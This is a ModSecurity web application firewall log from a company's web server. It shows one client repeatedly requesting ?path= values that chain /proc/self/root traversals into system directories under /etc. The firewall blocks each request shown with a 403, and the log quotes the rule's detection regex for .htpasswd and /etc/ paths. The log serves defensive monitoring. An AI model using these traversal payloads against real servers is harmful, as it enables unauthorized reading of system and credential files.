[Mon Mar 16 12:54:09.289899 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:46562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnoZqj1wV0Si-OkefuwQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:10.490861 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:58472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnopqj1wV0Si-OkefuwgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:11.685956 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:58478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgno9SswJuvopo3lOhfygAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:13.197471 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:58488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnpLABkC4fWIHEf8Hr5AAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:15.650279 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:58502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnprysWC90G-1nBrBGQwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:18.545837 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.243.203:58518] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnqRXjF1vJNtV6CWr27gAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:19.962286 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:58532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnq3jZBu2q05ozVU9YSwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:22.426825 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:48682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnrnjZBu2q05ozVU9YTwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:23.718351 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:48686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnrwlT9VtDQc7bgUyywQAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:25.016070 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:48690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnsY6lpbStxTqkSkttEwAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:26.264741 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:48704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnsrABkC4fWIHEf8Hr5wAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:27.627025 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:48718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnswlT9VtDQc7bgUyyxwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:28.922867 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:48730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgntNSswJuvopo3lOhfzgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:30.270918 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:56772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnthXjF1vJNtV6CWr29AAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:31.463523 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:56782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnt_9ocpUE4ed4uDzvvQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:32.746413 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:56798] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnuLysWC90G-1nBrBGSQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:34.055337 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:56814] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnuglT9VtDQc7bgUyyzQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:35.192038 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:56822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnu9SswJuvopo3lOhfzwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:36.476477 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:56836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnvHjZBu2q05ozVU9YVQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:37.660349 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.243.203:56838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnvRXjF1vJNtV6CWr29QAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:38.959928 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.243.203:56844] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgnvnbQATo66fKoS7xQWgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:54:40.241255 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:33340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 